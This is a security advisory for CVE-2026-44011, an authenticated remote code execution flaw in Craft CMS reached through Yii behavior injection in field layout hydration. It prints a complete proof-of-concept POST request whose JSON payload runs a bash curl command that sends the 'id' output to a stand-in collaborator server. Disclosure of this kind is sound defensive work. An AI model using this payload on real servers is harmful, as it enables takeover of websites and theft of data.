CVE-2026-44011: Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior

May 6, 2026

We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.

This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.

The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.

This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.

We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same beforeAction() path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:

POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json

{

"elementType": "craft\\elements\\Category",
"siteId": 1,
"search": "",
"condition": {
"class": "craft\\elements\\conditions\\ElementCondition",
"elementType": "craft\\elements\\Category",
"fieldLayouts": [
{
"as rce": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": [
"Psy\\Readline\\Hoa\\ConsoleProcessus",
"execute"
]
},
"typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/`id`\](https://yourcollaboratorservergoeshere/%60id%60/)""
}
]
},
"on *": "self::beforeSave"
}
]
}
}

References

Code Behaviors & Features

Detect and mitigate CVE-2026-44011 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →